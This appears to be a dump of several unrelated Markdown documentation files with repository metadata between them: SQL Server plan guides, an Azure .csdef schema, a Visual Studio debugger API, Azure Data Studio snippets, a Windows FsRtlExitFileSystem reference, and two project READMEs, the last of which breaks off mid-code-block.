ms.author: mikeray
manager: craigg
ms.openlocfilehash: 5b45a9adec50b1abc3c20b4d2ad56641db1d832f
ms.sourcegitcommit: ee661730fb695774b9c483c3dd0a6c314e17ddf8
ms.translationtype: HT
ms.contentlocale: ja-JP
ms.lasthandoff: 05/19/2018
---
# <a name="create-a-plan-guide-for-parameterized-queries"></a>Create a plan guide for parameterized queries
  [!INCLUDE[appliesto-ss-xxxx-xxxx-xxx-md](../../includes/appliesto-ss-xxxx-xxxx-xxx-md.md)]

A TEMPLATE plan guide matches stand-alone queries that parameterize to a specified form. The following example creates a plan guide that matches queries that parameterize to a specified form, and directs [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] to force the parameterization of the query. The following two queries are syntactically equivalent, differing only in their constant literal values.

```
SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h
INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d
ON h.SalesOrderID = d.SalesOrderID
WHERE h.SalesOrderID = 45639;

SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h
INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d
ON h.SalesOrderID = d.SalesOrderID
WHERE h.SalesOrderID = 45640;
```

Here is the plan guide on the parameterized form of the query:

```
EXEC sp_create_plan_guide
    @name = N'TemplateGuide1',
    @stmt = N'SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h
              INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d
              ON h.SalesOrderID = d.SalesOrderID
              WHERE h.SalesOrderID = @0',
    @type = N'TEMPLATE',
    @module_or_batch = NULL,
    @params = N'@0 int',
    @hints = N'OPTION(PARAMETERIZATION FORCED)';
```

In this example, the value of the `@stmt` parameter is the parameterized form of the query. The only reliable way to obtain this value for use in sp_create_plan_guide is to use the [sp_get_query_template](../../relational-databases/system-stored-procedures/sp-get-query-template-transact-sql.md) system stored procedure. The following script can be used both to obtain the parameterized query and then to create a plan guide on it.

```
DECLARE @stmt nvarchar(max);
DECLARE @params nvarchar(max);
EXEC sp_get_query_template
    N'SELECT * FROM AdventureWorks2012.Sales.SalesOrderHeader AS h
      INNER JOIN AdventureWorks2012.Sales.SalesOrderDetail AS d
      ON h.SalesOrderID = d.SalesOrderID
      WHERE h.SalesOrderID = 45639;',
    @stmt OUTPUT,
    @params OUTPUT
EXEC sp_create_plan_guide N'TemplateGuide1',
    @stmt,
    N'TEMPLATE',
    NULL,
    @params,
    N'OPTION(PARAMETERIZATION FORCED)';
```

> [!IMPORTANT]
> The value of the constant literals in the `@stmt` parameter passed to `sp_get_query_template` may affect the data type that is chosen for the parameter that replaces the literal. This value also affects plan guide matching. You may have to create more than one plan guide to cover different parameter value ranges.

You can also use TEMPLATE plan guides together with SQL plan guides. For example, you can create a TEMPLATE plan guide to ensure that a certain class of queries is parameterized. You can then create a SQL plan guide on the parameterized form of that query.
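As a hedged follow-up, the guide created above can be inspected in the `sys.plan_guides` catalog view and managed with `sp_control_plan_guide`; the statements below assume the guide name `TemplateGuide1` from the example:

```
-- Confirm the template guide exists and see its parameterized statement.
SELECT name, scope_type_desc, is_disabled, query_text, parameters
FROM sys.plan_guides
WHERE name = N'TemplateGuide1';

-- Disable it temporarily, then drop it when no longer needed.
EXEC sp_control_plan_guide N'DISABLE', N'TemplateGuide1';
EXEC sp_control_plan_guide N'DROP',    N'TemplateGuide1';
```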
37.904762
304
0.736495
yue_Hant
0.922334
538d7cfb53e396fa447c93688c69b7dc2dc6d6c6
3,939
md
Markdown
articles/cloud-services/schema-csdef-file.md
koudaiii/azure-docs.ja-jp
60402401bd4bd5863ea720c3aeb9f3271d1cda53
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cloud-services/schema-csdef-file.md
koudaiii/azure-docs.ja-jp
60402401bd4bd5863ea720c3aeb9f3271d1cda53
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/cloud-services/schema-csdef-file.md
koudaiii/azure-docs.ja-jp
60402401bd4bd5863ea720c3aeb9f3271d1cda53
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Azure Cloud Services (classic) definition schema (.csdef file) | Microsoft Docs
description: The service definition (.csdef) file defines an application's service model, including the roles that are available to the service, the endpoints, and configuration values.
ms.topic: article
ms.service: cloud-services
ms.date: 10/14/2020
ms.author: tagore
author: tanmaygore
ms.reviewer: mimckitt
ms.custom: ''
ms.openlocfilehash: de81b6ffb5b4dc944f3d538a116383d06145661b
ms.sourcegitcommit: 6272bc01d8bdb833d43c56375bab1841a9c380a5
ms.translationtype: HT
ms.contentlocale: ja-JP
ms.lasthandoff: 01/23/2021
ms.locfileid: "98739803"
---
# <a name="azure-cloud-services-classic-definition-schema-csdef-file"></a>Azure Cloud Services (classic) definition schema (.csdef file)

> [!IMPORTANT]
> [Azure Cloud Services (extended support)](../cloud-services-extended-support/overview.md) is a new Azure Resource Manager based deployment model for the Azure Cloud Services product. With this change, Azure Cloud Services running on the Azure Service Manager based deployment model have been renamed Cloud Services (classic), and all new deployments should use [Cloud Services (extended support)](../cloud-services-extended-support/overview.md).

The service definition file defines the service model for an application. The file contains definitions for the roles that are available to a cloud service, specifies the service endpoints, and establishes configuration settings for the service. Configuration setting values are set in the service configuration file, as described in the [Cloud Services (classic) configuration schema](/previous-versions/azure/reference/ee758710(v=azure.100)).

By default, the Azure Diagnostics configuration schema file is installed to the `C:\Program Files\Microsoft SDKs\Windows Azure\.NET SDK\<version>\schemas` directory. Replace `<version>` with the installed version of the [Azure SDK](https://www.windowsazure.com/develop/downloads/).

The default extension for the service definition file is .csdef.

## <a name="basic-service-definition-schema"></a>Basic service definition schema
The service definition file must contain one `ServiceDefinition` element. The service definition must contain at least one role (`WebRole` or `WorkerRole`) element. It can contain up to 25 roles defined in a single definition, and you can mix role types. The service definition also contains the optional `NetworkTrafficRules` element, which restricts which roles can communicate with specified internal endpoints. It also contains the optional `LoadBalancerProbes` element, which contains customer-defined health probes of endpoints.

The basic format of the service definition file is as follows:

```xml
<ServiceDefinition name="<service-name>" topologyChangeDiscovery="<change-type>" xmlns="http://schemas.microsoft.com/ServiceHosting/2008/10/ServiceDefinition" upgradeDomainCount="<number-of-upgrade-domains>" schemaVersion="<version>">
  <LoadBalancerProbes>
    …
  </LoadBalancerProbes>
  <WebRole …>
    …
  </WebRole>
  <WorkerRole …>
    …
  </WorkerRole>
  <NetworkTrafficRules>
    …
  </NetworkTrafficRules>
</ServiceDefinition>
```

## <a name="schema-definitions"></a>Schema definitions
The following topics describe the schema:

- [LoadBalancerProbe schema](schema-csdef-loadbalancerprobe.md)
- [WebRole schema](schema-csdef-webrole.md)
- [WorkerRole schema](schema-csdef-workerrole.md)
- [NetworkTrafficRules schema](schema-csdef-networktrafficrules.md)

## <a name="servicedefinition-element"></a><a name="ServiceDefinition"></a> ServiceDefinition element
The `ServiceDefinition` element is the top-level element of the service definition file.

The following table describes the attributes of the `ServiceDefinition` element.

| Attribute | Description |
| ----------------------- | ----------- |
| name |Required. The name of the service. The name must be unique within the service account.|
| topologyChangeDiscovery | Optional. Specifies the type of topology change notification. Possible values are:<br /><br /> - `Blast` - Sends the update as soon as possible to all role instances. If you choose this option, the role should be able to handle the topology update without being restarted.<br />- `UpgradeDomainWalk` - Sends the update to each role instance in a sequential manner after the previous instance has successfully accepted the update.|
| schemaVersion | Optional. Specifies the version of the service definition schema. The schema version allows Visual Studio to select the correct SDK tools to use for schema validation if more than one version of the SDK is installed side by side.|
| upgradeDomainCount | Optional. Specifies the number of upgrade domains across which roles in this service are allocated. Role instances are allocated to an upgrade domain when the service is deployed. For more information, see [Update a cloud service role or deployment](cloud-services-how-to-manage-portal.md#update-a-cloud-service-role-or-deployment), [Manage the availability of virtual machines](../virtual-machines/manage-availability.md), and the [Cloud Service model overview](./cloud-services-model-and-package.md).<br /><br /> You can specify up to 20 upgrade domains. If not specified, the default number of upgrade domains is 5.|
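For illustration, here is a hedged minimal service definition with a single web role; the role name, VM size, and endpoint shown are placeholder assumptions, not required values:

```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- Hypothetical minimal definition: one web role with one HTTP input endpoint. -->
<ServiceDefinition name="MyService" upgradeDomainCount="5"
    xmlns="http://schemas.microsoft.com/ServiceHosting/2008/10/ServiceDefinition">
  <WebRole name="WebRole1" vmsize="Small">
    <Sites>
      <Site name="Web">
        <Bindings>
          <Binding name="Endpoint1" endpointName="Endpoint1" />
        </Bindings>
      </Site>
    </Sites>
    <Endpoints>
      <!-- Public HTTP endpoint handled by the load balancer. -->
      <InputEndpoint name="Endpoint1" protocol="http" port="80" />
    </Endpoints>
  </WebRole>
</ServiceDefinition>
```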
53.22973
451
0.772531
yue_Hant
0.757457
538e14d99934a0a4bd206fb1ce9ad8fa55bc200e
2,570
md
Markdown
docs/vs-2015/extensibility/debugger/reference/idebugbreakpointunboundevent2-getreason.md
mairaw/visualstudio-docs.pt-br
26480481c1cdab3e77218755148d09daec1b3454
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/vs-2015/extensibility/debugger/reference/idebugbreakpointunboundevent2-getreason.md
mairaw/visualstudio-docs.pt-br
26480481c1cdab3e77218755148d09daec1b3454
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/vs-2015/extensibility/debugger/reference/idebugbreakpointunboundevent2-getreason.md
mairaw/visualstudio-docs.pt-br
26480481c1cdab3e77218755148d09daec1b3454
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: IDebugBreakpointUnboundEvent2::GetReason | Microsoft Docs
ms.custom: ''
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.reviewer: ''
ms.suite: ''
ms.technology:
- vs-ide-sdk
ms.tgt_pltfrm: ''
ms.topic: article
f1_keywords:
- IDebugBreakpointUnboundEvent2::GetReason
helpviewer_keywords:
- IDebugBreakpointUnboundEvent2::GetReason
ms.assetid: 0f8a4fec-d3eb-417d-8516-4f7b51904033
caps.latest.revision: 13
ms.author: gregvanl
manager: ghogen
ms.openlocfilehash: 4360baeb03847df22b7eff4e5ffdc4fa1eed3e67
ms.sourcegitcommit: af428c7ccd007e668ec0dd8697c88fc5d8bca1e2
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 11/16/2018
ms.locfileid: "51797631"
---
# <a name="idebugbreakpointunboundevent2getreason"></a>IDebugBreakpointUnboundEvent2::GetReason
[!INCLUDE[vs2017banner](../../../includes/vs2017banner.md)]

Gets the reason why the breakpoint was unbound.

## <a name="syntax"></a>Syntax

```cpp#
HRESULT GetReason(
   BP_UNBOUND_REASON* pdwUnboundReason
);
```

```csharp
int GetReason(
   out enum_ BP_UNBOUND_REASON pdwUnboundReason
);
```

#### <a name="parameters"></a>Parameters
`pdwUnboundReason`

[out] Returns a value from the [BP_UNBOUND_REASON](../../../extensibility/debugger/reference/bp-unbound-reason.md) enumeration that specifies the reason why the breakpoint was unbound.

## <a name="return-value"></a>Return value
If successful, returns `S_OK`; otherwise, returns an error code.

## <a name="remarks"></a>Remarks
Reasons include a breakpoint being rebound to a different location after an edit-and-continue operation, or a determination that a breakpoint was bound in error.

## <a name="example"></a>Example
The following example shows how to implement this method for a **CBreakpointUnboundDebugEventBase** object that exposes the [IDebugBreakpointUnboundEvent2](../../../extensibility/debugger/reference/idebugbreakpointunboundevent2.md) interface.

```cpp#
STDMETHODIMP CBreakpointUnboundDebugEventBase::GetReason(
    BP_UNBOUND_REASON* pdwUnboundReason)
{
    HRESULT hRes = E_FAIL;

    if ( EVAL(pdwUnboundReason) )
    {
        *pdwUnboundReason = m_dwReason;
        hRes = S_OK;
    }
    else
        hRes = E_INVALIDARG;

    return ( hRes );
}
```

## <a name="see-also"></a>See also
[IDebugBreakpointUnboundEvent2](../../../extensibility/debugger/reference/idebugbreakpointunboundevent2.md)
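On the consumer side, here is a hedged sketch of how a debug-event handler might query the reason. The surrounding handler function is an illustrative assumption; the `BPUR_*` members come from the BP_UNBOUND_REASON enumeration referenced above:

```cpp#
// Hypothetical handler fragment: pEvent is an IDebugBreakpointUnboundEvent2*
// obtained via QueryInterface inside IDebugEventCallback2::Event.
void HandleBreakpointUnbound(IDebugBreakpointUnboundEvent2* pEvent)
{
    BP_UNBOUND_REASON reason;
    if (SUCCEEDED(pEvent->GetReason(&reason)))
    {
        switch (reason)
        {
        case BPUR_CODE_UNLOADED:     /* module containing the code went away */ break;
        case BPUR_BREAKPOINT_REBIND: /* rebound after edit-and-continue      */ break;
        case BPUR_BREAKPOINT_ERROR:  /* breakpoint had been bound in error   */ break;
        default:                     /* BPUR_UNKNOWN or future values        */ break;
        }
    }
}
```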
31.728395
240
0.729183
por_Latn
0.560909
538e99a973fc2b7a38c4179ffd3a3e2bfcc55766
6,061
md
Markdown
windows-driver-docs-pr/ifs/fsrtlexitfilesystem.md
josephpracharmsft/windows-driver-docs
1aade029928ee88429924a993047b7725246c352
[ "CC-BY-4.0", "MIT" ]
1
2020-02-26T02:51:21.000Z
2020-02-26T02:51:21.000Z
windows-driver-docs-pr/ifs/fsrtlexitfilesystem.md
josephpracharmsft/windows-driver-docs
1aade029928ee88429924a993047b7725246c352
[ "CC-BY-4.0", "MIT" ]
1
2021-01-21T17:24:17.000Z
2021-01-21T17:24:17.000Z
windows-driver-docs-pr/ifs/fsrtlexitfilesystem.md
josephpracharmsft/windows-driver-docs
1aade029928ee88429924a993047b7725246c352
[ "CC-BY-4.0", "MIT" ]
2
2020-08-11T00:01:58.000Z
2021-11-24T02:51:30.000Z
---
title: FsRtlExitFileSystem function
description: The FsRtlExitFileSystem macro re-enables the delivery of normal kernel-mode APCs that were disabled by a preceding call to FsRtlEnterFileSystem.
ms.assetid: 763ceb1c-f614-4268-a7fe-73de0c354c71
keywords: ["FsRtlExitFileSystem function Installable File System Drivers"]
topic_type:
- apiref
api_name:
- FsRtlExitFileSystem
api_location:
- Ntifs.h
api_type:
- HeaderDef
ms.date: 11/28/2017
ms.localizationpriority: medium
---

# FsRtlExitFileSystem function

The **FsRtlExitFileSystem** macro re-enables the delivery of normal kernel-mode APCs that were disabled by a preceding call to [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md).

Syntax
------

```ManagedCPlusPlus
VOID FsRtlExitFileSystem(
   VOID
);
```

Parameters
----------

None.

Return value
------------

This function does not return a value.

Remarks
-------

Every file system driver entry point routine must call [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) immediately before acquiring a resource required in performing a file I/O request and call **FsRtlExitFileSystem** immediately afterward. This ensures that the routine cannot be suspended while running and thus block other file I/O requests.

Every successful call to [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) must be matched by a subsequent call to **FsRtlExitFileSystem**.

Note that, unlike local file systems and network redirectors, file system filter drivers should never disable delivery of normal kernel APCs (by calling [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) or [**KeEnterCriticalRegion**](https://docs.microsoft.com/windows-hardware/drivers/ddi/ntddk/nf-ntddk-keentercriticalregion) or by raising to IRQL APC\_LEVEL) across a call to [**IoCallDriver**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-iocalldriver). The only time when a file system filter driver should disable normal kernel APCs is immediately before calling [**ExAcquireResourceExclusive**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl), [**ExAcquireResourceExclusiveLite**](https://msdn.microsoft.com/library/windows/hardware/ff544351), [**ExAcquireResourceShared**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl), [**ExAcquireResourceSharedLite**](https://msdn.microsoft.com/library/windows/hardware/ff544363), or [**ExAcquireSharedStarveExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544367). After calling [**ExReleaseResource**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) or [**ExReleaseResourceLite**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-exreleaseresourcelite), the filter driver should immediately re-enable delivery of normal kernel APCs.

As an alternative to [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md), minifilter drivers can use the [**FltAcquireResourceExclusive**](fltacquireresourceexclusive.md), [**FltAcquireResourceShared**](fltacquireresourceshared.md), and [**FltReleaseResource**](fltreleaseresource.md) routines, which properly handle APCs when acquiring and releasing a resource.

It is not necessary to disable normal kernel APCs before calling [**ExAcquireSharedWaitForExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544370) because this routine calls [**KeRaiseIrqlToDpcLevel**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-keraiseirqltodpclevel), which disables both normal and special kernel APCs.
It is also not necessary to do so before calling [**ExAcquireFastMutex**](https://docs.microsoft.com/previous-versions/windows/hardware/drivers/ff544337(v=vs.85)) or [**ExAcquireResourceExclusive**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl), because these routines disable normal kernel APCs. Requirements ------------ <table> <colgroup> <col width="50%" /> <col width="50%" /> </colgroup> <tbody> <tr class="odd"> <td align="left"><p>Target platform</p></td> <td align="left">Desktop</td> </tr> <tr class="even"> <td align="left"><p>Header</p></td> <td align="left">Ntifs.h (include Ntifs.h)</td> </tr> <tr class="odd"> <td align="left"><p>IRQL</p></td> <td align="left"><p>&lt;= APC_LEVEL</p></td> </tr> </tbody> </table> ## See also [**ExAcquireFastMutex**](https://docs.microsoft.com/previous-versions/windows/hardware/drivers/ff544337(v=vs.85)) [**ExAcquireResourceExclusive**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) [**ExAcquireResourceExclusiveLite**](https://msdn.microsoft.com/library/windows/hardware/ff544351) [**ExAcquireResourceShared**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) [**ExAcquireResourceSharedLite**](https://msdn.microsoft.com/library/windows/hardware/ff544363) [**ExAcquireSharedWaitForExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544370) [**ExAcquireSharedStarveExclusive**](https://msdn.microsoft.com/library/windows/hardware/ff544367) [**ExReleaseResource**](https://docs.microsoft.com/windows-hardware/drivers/kernel/mmcreatemdl) [**ExReleaseResourceLite**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-exreleaseresourcelite) [**ExTryToAcquireFastMutex**](https://docs.microsoft.com/previous-versions/windows/hardware/drivers/ff545647(v=vs.85)) [**FltAcquireResourceExclusive**](fltacquireresourceexclusive.md) [**FltAcquireResourceShared**](fltacquireresourceshared.md) [**FltReleaseResource**](fltreleaseresource.md) [**FsRtlEnterFileSystem**](fsrtlenterfilesystem.md) [**IoCallDriver**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-iocalldriver) [**KeLeaveCriticalRegion**](https://docs.microsoft.com/windows-hardware/drivers/ddi/ntddk/nf-ntddk-keleavecriticalregion) [**KeRaiseIrqlToDpcLevel**](https://docs.microsoft.com/windows-hardware/drivers/ddi/wdm/nf-wdm-keraiseirqltodpclevel)
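As a hedged illustration of the pairing rule described in the Remarks, the fragment below brackets a resource acquisition with the enter/exit calls. The `PMY_FCB` type, its `Resource` field, and the work in between are placeholder assumptions about the surrounding driver:

```c
#include <ntifs.h>

// Hypothetical dispatch fragment; PMY_FCB is a placeholder for the driver's
// file context block, assumed to contain an initialized ERESOURCE.
VOID DoWorkUnderResource(PMY_FCB Fcb)
{
    FsRtlEnterFileSystem();                             // disable normal kernel APCs
    ExAcquireResourceSharedLite(&Fcb->Resource, TRUE);  // block until acquired

    /* ... perform the file I/O work that requires the resource ... */

    ExReleaseResourceLite(&Fcb->Resource);
    FsRtlExitFileSystem();                              // re-enable normal kernel APCs
}
```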
48.103175
1,294
0.766375
eng_Latn
0.373853
538ea9bfe7b0e7c1cf1ae2768805c7ac9a0d0e9e
126
md
Markdown
assets/defold-api-emmylua.md
aglitchman/defold.github.io
ca0c499df9686bdbc8a619f28845856a28ba746d
[ "Apache-2.0" ]
null
null
null
assets/defold-api-emmylua.md
aglitchman/defold.github.io
ca0c499df9686bdbc8a619f28845856a28ba746d
[ "Apache-2.0" ]
null
null
null
assets/defold-api-emmylua.md
aglitchman/defold.github.io
ca0c499df9686bdbc8a619f28845856a28ba746d
[ "Apache-2.0" ]
null
null
null
---
layout: asset
asset: defold-api-emmylua
title: IntelliJ Defold API
description: Defold API headers for the EmmyLua plugin
---
18
50
0.769841
eng_Latn
0.617823
538f22cf3dfae3b9a597ab46eb299500886567cb
3,158
md
Markdown
docs/azure-data-studio/code-snippets.md
marcustung/sql-docs.zh-tw
f64ee32984b48f6607d66d80450d51c2b2b6531d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/azure-data-studio/code-snippets.md
marcustung/sql-docs.zh-tw
f64ee32984b48f6607d66d80450d51c2b2b6531d
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/azure-data-studio/code-snippets.md
marcustung/sql-docs.zh-tw
f64ee32984b48f6607d66d80450d51c2b2b6531d
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Create reusable code snippets
titleSuffix: Azure Data Studio
description: Learn how to create and use SQL code snippets in Azure Data Studio
ms.prod: sql
ms.technology: azure-data-studio
ms.topic: conceptual
author: markingmyname
ms.author: maghan
ms.reviewer: alayu; sstein
ms.custom: seodec18
ms.date: 09/24/2018
ms.openlocfilehash: 09a8432d10a70bb8530654d76bce874f735788a6
ms.sourcegitcommit: b2464064c0566590e486a3aafae6d67ce2645cef
ms.translationtype: MT
ms.contentlocale: zh-TW
ms.lasthandoff: 07/15/2019
ms.locfileid: "67959705"
---
# <a name="create-and-use-code-snippets-to-quickly-create-transact-sql-t-sql-scripts-in-includename-sosincludesname-sos-shortmd"></a>Create and use code snippets to quickly create Transact-SQL (T-SQL) scripts in [!INCLUDE[name-sos](../includes/name-sos-short.md)]

Code snippets in [!INCLUDE[name-sos](../includes/name-sos-short.md)] are templates that make it easy to create databases and database objects. [!INCLUDE[name-sos](../includes/name-sos-short.md)] provides several T-SQL snippets to help you quickly generate the correct syntax. You can also create user-defined code snippets.

## <a name="using-built-in-t-sql-code-snippets"></a>Using the built-in T-SQL code snippets

1. To access the available snippets, type *sql* in the query editor to open the list:

   ![Code snippets](media/code-snippets/sql-snippets.png)

1. Select the snippet you want to use, and it generates the T-SQL script. For example, select *sqlCreateTable*:

   ![Create table snippet](media/code-snippets/create-table.png)

1. Update the highlighted fields with your specific values. For example, replace the *TableName* and *Schema* values with values appropriate for your database:

   ![Replace template fields](media/code-snippets/table-from-snippet.png)

   If the field you want to change is no longer highlighted (this happens when you move the cursor around the editor), right-click the text you want to change and select **Change All Occurrences**:

   ![Replace template fields](media/code-snippets/change-all.png)

1. Update or add any additional T-SQL for the selected snippet as required. For example, update *Column1* and *Column2*, and add more data fields.

## <a name="creating-sql-code-snippets"></a>Creating SQL code snippets

You can define your own code snippets. To open the SQL snippets file for editing:

1. Open the *Command Palette* (**Shift+Ctrl+P**), type *snippet*, and select **Preferences: Open User Snippets**:

   ![Open user snippets](media/code-snippets/user-snippets.png)

1. Select **SQL**:

   > [!NOTE]
   > [!INCLUDE[name-sos](../includes/name-sos-short.md)] inherits its code snippet functionality from Visual Studio Code, so this article discusses the use of SQL snippets specifically. For more information, see [Creating your own snippets](https://code.visualstudio.com/docs/editor/userdefinedsnippets) in the Visual Studio Code documentation.

   ![Select SQL](media/code-snippets/select-sql.png)

1. Paste the following code into *sql.json*:

   ```json
   {
       "Select top 5": {
           "prefix": "sqlSelectTop5",
           "body": "SELECT TOP 5 * FROM ${1:TableName}",
           "description": "User-defined snippet example 1"
       },
       "Create Table snippet":{
           "prefix": "sqlCreateTable2",
           "body": [
               "-- Create a new table called '${1:TableName}' in schema '${2:SchemaName}'",
               "-- Drop the table if it already exists",
               "IF OBJECT_ID('$2.$1', 'U') IS NOT NULL",
               "DROP TABLE $2.$1",
               "GO",
               "-- Create the table in the specified schema",
               "CREATE TABLE $2.$1",
               "(",
               "   $1Id INT NOT NULL PRIMARY KEY, -- primary key column",
               "   Column1 [NVARCHAR](50) NOT NULL,",
               "   Column2 [NVARCHAR](50) NOT NULL",
               "   -- specify more columns here",
               ");",
               "GO"
           ],
           "description": "User-defined snippet example 2"
       }
   }
   ```

1. Save the sql.json file.

1. Open a new query editor window by pressing **Ctrl+N**.

2. Type **sql**, and you see the two user snippets you just added: *sqlCreateTable2* and *sqlSelectTop5*. Select one of the new snippets and give it a try!

## <a name="additional-resources"></a>Additional resources

For information about the SQL editor, see the [code editor tutorial](tutorial-sql-editor.md).
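As a hedged extension of the example, snippets inherited from Visual Studio Code also support choice placeholders; the snippet below is an illustrative assumption, not part of the built-in set:

```json
{
    "Select with sort order": {
        "prefix": "sqlSelectSorted",
        "body": "SELECT * FROM ${1:TableName} ORDER BY ${2:ColumnName} ${3|ASC,DESC|}",
        "description": "User-defined snippet with a choice placeholder"
    }
}
```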
29.514019
231
0.693477
yue_Hant
0.70269
5390a316f2c1e62df95d4e9daaa173e10acf10b4
633
md
Markdown
gutils/README.md
gravypod/p4-constraints
3c02ca5750acf9af814cc12b4ad0547d452ed831
[ "Apache-2.0" ]
null
null
null
gutils/README.md
gravypod/p4-constraints
3c02ca5750acf9af814cc12b4ad0547d452ed831
[ "Apache-2.0" ]
null
null
null
gutils/README.md
gravypod/p4-constraints
3c02ca5750acf9af814cc12b4ad0547d452ed831
[ "Apache-2.0" ]
null
null
null
# Utilities

These libraries provide basic functions used throughout the code base.

The files in this directory are copied/adapted from the following repositories:

*   https://github.com/google/mediapipe
*   https://github.com/google/iree
*   https://github.com/google/nucleus

The files from these repositories carry the following copyrights, respectively:

Copyright 2019 The MediaPipe Authors
Copyright 2018 Google LLC
Copyright 2019 Google LLC

All code in this directory should eventually make its way into the Abseil, Googletest, and Protocol Buffers libraries; we should thus be able to gradually shrink and eventually eliminate this directory.
33.315789
79
0.796209
eng_Latn
0.975415
5390c9a3626db321eda0b76d9ab10aa4ff696fc7
98
md
Markdown
api/indicators/13-1-0.md
PiotrWalaszczak/sdg-indicators-pl
2518a2054a2920c08a1212c11f7eb0718c5ad6b6
[ "CC0-1.0" ]
null
null
null
api/indicators/13-1-0.md
PiotrWalaszczak/sdg-indicators-pl
2518a2054a2920c08a1212c11f7eb0718c5ad6b6
[ "CC0-1.0" ]
null
null
null
api/indicators/13-1-0.md
PiotrWalaszczak/sdg-indicators-pl
2518a2054a2920c08a1212c11f7eb0718c5ad6b6
[ "CC0-1.0" ]
null
null
null
--- permalink: /api/13-1-0.json sdg_goal: 13 layout: json_indicator indicator: "13.1.0" ---
14
28
0.642857
hun_Latn
0.168318
539141c5cb460283ca26ddf7dfbe3fc992775772
2,301
md
Markdown
README.md
actarian/rxcomp-todomvc
c3d3c8d19a2b3cc9186544772aaa3515594ccaaf
[ "MIT" ]
null
null
null
README.md
actarian/rxcomp-todomvc
c3d3c8d19a2b3cc9186544772aaa3515594ccaaf
[ "MIT" ]
1
2020-05-08T08:06:32.000Z
2020-05-08T08:06:32.000Z
README.md
actarian/rxcomp-todomvc
c3d3c8d19a2b3cc9186544772aaa3515594ccaaf
[ "MIT" ]
null
null
null
# 💎 TodoMvc RxComp demo

[![Licence](https://img.shields.io/github/license/actarian/rxcomp-todomvc.svg)](https://github.com/actarian/rxcomp-todomvc)

This is a demo app for the [RxComp](https://github.com/actarian/rxcomp) reactive component library. Built on top of [RxJs](https://github.com/ReactiveX/rxjs), it mimics the [Angular](https://angular.io/) declarative syntax.

If you like Angular's declarative syntax but you just want to go vanilla, the RxComp library comes in useful.

> [TodoMvc Demo](https://actarian.github.io/rxcomp-todomvc/)
> [TodoMvc Codepen](https://codepen.io/actarian/pen/QWWRZON?editors=0010)
> [RxComp Github Project](https://github.com/actarian/rxcomp)
___

### Install packages

```
npm install
```
___

### Build, Serve & Watch

```
gulp
```
___

### Dependencies

```json
"rxcomp": "1.0.0-beta.9",
"rxjs": "~6.5.4",
```

### CDN

```html
<script src="https://unpkg.com/@reactivex/[email protected]/dist/global/rxjs.umd.min.js"></script>
<script src="https://unpkg.com/[email protected]/dist/rxcomp.min.js"></script>
```

## Contributing
___

*Pull requests are welcome; please submit bugs 🐞*

*Thank you for taking the time to provide feedback and review. This feedback is appreciated and very helpful 🌈*

[![GitHub forks](https://img.shields.io/github/forks/actarian/rxcomp.svg?style=social&label=Fork&maxAge=2592000)](https://gitHub.com/actarian/rxcomp/network/)
[![GitHub stars](https://img.shields.io/github/stars/actarian/rxcomp.svg?style=social&label=Star&maxAge=2592000)](https://GitHub.com/actarian/rxcomp/stargazers/)
[![GitHub followers](https://img.shields.io/github/followers/actarian.svg?style=social&label=Follow&maxAge=2592000)](https://github.com/actarian?tab=followers)

* [Github Project Page](https://github.com/actarian/rxcomp)

*If you find it helpful, feel free to contribute to keeping this library up to date via [PayPal](https://www.paypal.me/circledev/5)*

[![PayPal](https://www.paypalobjects.com/webstatic/en_US/i/buttons/PP_logo_h_100x26.png)](https://www.paypal.me/circledev/5)
___

## Contact

* Luca Zampetti <[email protected]>
* Follow [@actarian](https://twitter.com/actarian) on Twitter

[![Twitter Follow](https://img.shields.io/twitter/follow/actarian.svg?style=social&label=Follow%20@actarian)](https://twitter.com/actarian)
___
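As a hedged sketch of the Angular-like declarative style mentioned above: the component, selector, template, and bootstrap calls below are assumptions drawn from RxComp's Angular-style conventions, so check the RxComp documentation for the exact API.

```js
// Hypothetical sketch only: names and signatures follow the Angular-like
// conventions this README describes; verify against the RxComp docs.
import { Browser, Component, CoreModule, Module } from 'rxcomp';

class TodoItemComponent extends Component {
  onInit() {
    this.done = false; // reactive state read by the template below
  }
  toggle() {
    this.done = !this.done;
  }
}
TodoItemComponent.meta = {
  selector: '[todo-item-component]',
  template: `<span (click)="toggle()">{{done ? 'done' : 'todo'}}</span>`,
};

class AppModule extends Module {}
AppModule.meta = {
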